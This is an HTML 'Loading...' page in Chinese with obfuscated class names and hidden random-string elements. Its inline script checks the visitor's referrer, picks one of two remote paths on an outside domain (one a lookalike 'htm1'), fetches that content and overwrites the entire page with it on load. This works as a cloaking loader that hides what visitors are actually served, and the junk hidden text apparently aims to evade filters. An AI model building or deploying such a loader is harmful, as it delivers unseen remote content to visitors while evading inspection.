<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .JtB4fp4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .JtB4fp4 .unddfd8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .JtB4fp4 .content {
            line-height: 50px;
            text-align: center
        }

        .JtB4fp4 .img {
            width: 100%
        }

        .JtB4fp4 .KkNWm9VpZ {
            text-align: center
        }

        .JtB4fp4 .KkNWm9VpZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .JtB4fp4 .KkNWm9VpZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .JtB4fp4 .KkNWm9VpZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .JtB4fp4 .KkNWm9VpZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .JtB4fp4 .KkNWm9VpZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .JtB4fp4 .KkNWm9VpZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .JtB4fp4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rWkvcSTQEFl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var z8ZmnPl = rWkvcSTQEFl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ z8ZmnPl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ z8ZmnPl +".html?a=share";
		}
		
        uUgHg0=url+"#"+new Date().getTime();
        uUgHg0 && function() {
            $.get(uUgHg0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>ljn8kH4HvYH1KJ7qV4gT5JLkKiGUvQfOkcWIjxbo</p>
<h1 style='display:none' >DSahi9yPvlpcEAV2cyX53q6FdZhdFdGZxBjGtKuuPKZYMMETZE9ZMMfD4uuNckYyPOFPaa5bKqGJBFLq9FGQDlPT87e9H7Hl5</h1><div class="JtB4fp4">
    <div class="unddfd8">
        <div class="KkNWm9VpZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >x7XXekgRSbhyx2cOeUenUrir7s5Uym7CicmKAyB1W10HdwWulgg1yAs6CpKy4i</h1>
<div style='display:none'>R8fypYSnpQPGVWnnhMw2VZ4rQayNrVl7s6fmNsKrUWVesxBXmjt5BwYzBEYdCrwOdkrc5VxNi9uAgmDuxH3kOtv4DEpn</div>
<p  style='display:none'>AT4R0rDuMkSmBJtKHJugXWvai8c0MhRBRedciJ</p></body>
</html>